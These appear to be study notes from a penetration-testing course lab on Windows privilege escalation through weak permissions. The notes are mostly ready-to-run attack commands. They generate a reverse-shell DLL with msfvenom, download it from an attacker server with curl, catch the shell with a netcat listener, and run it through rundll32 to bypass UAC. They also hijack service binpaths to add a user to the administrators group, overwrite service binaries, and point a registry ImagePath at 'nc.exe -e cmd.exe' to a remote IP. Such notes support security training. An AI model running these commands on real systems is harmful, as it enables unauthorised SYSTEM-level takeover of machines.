15.Weak-permissions

whoami command to check current user information

whoami /user

List members of the administrators group

net localgroup administrators

Display the privileges of the current user

whoami /priv

Query registry to check if UAC is enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Query registry for administrator consent prompt behavior

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

Get the OS version using PowerShell

[environment]::OSVersion.Version

Print the PATH environment variable

cmd /c echo %PATH%

List tasks and filter for rundll32 processes

# Useful to identify suspicious rundll32 usage
tasklist /svc | findstr "rundll32"

Kill a process by specifying its PID

# Replace <pid> with the actual process ID
taskkill /PID <pid> /F

Generate a reverse TCP shell DLL using msfvenom

# Replace <attacker_ip> and <attacker_port> with actual values
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll

Start a Python HTTP server to host the DLL payload

python3 -m http.server <port>

Download the DLL file from the attacker's server using curl

curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll"

Set up Netcat listener to capture the reverse shell

nc -lvnp <attacker_port>

Execute the DLL payload using rundll32

rundll32 shell32.dll,Control_RunDLL C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll

Open advanced system properties dialog

C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe

Confirm the current user after potential privilege escalation

whoami

1. Permissive File System ACLs (SecurityService)

.\SharpUp.exe audit
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService

2. Weak Service Permissions (WindscribeService)

SharpUp.exe audit
accesschk.exe /accepteula -quvcw WindscribeService
net localgroup administrators
sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
sc stop WindscribeService
sc start WindscribeService
net localgroup administrators
sc config WindScribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
sc start WindScribeService
sc query WindScribeService

3. Unquoted Service Paths (SystemExplorerHelpService)

sc qc SystemExplorerHelpService
wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

4. Permissive Registry ACLs (ModelManagerService)

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

5. Modifiable Registry Autorun Binary

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

Key Concepts:

• Weak Windows Permissions: Misconfigurations allow privilege escalation.

• Service Focus: Services run as SYSTEM, key targets.

Approach, Commands, Tools, and Techniques:

1. Detect: SharpUp, accesschk, icacls, wmic, PowerShell (autorun).

2. Exploit: copy, sc config/start/stop, net localgroup, PowerShell (registry).

3. Verify: net localgroup, sc query.

Commands:

• SharpUp, accesschk, icacls, sc, net localgroup, copy, wmic, PowerShell (Set-ItemProperty, Get-CimInstance).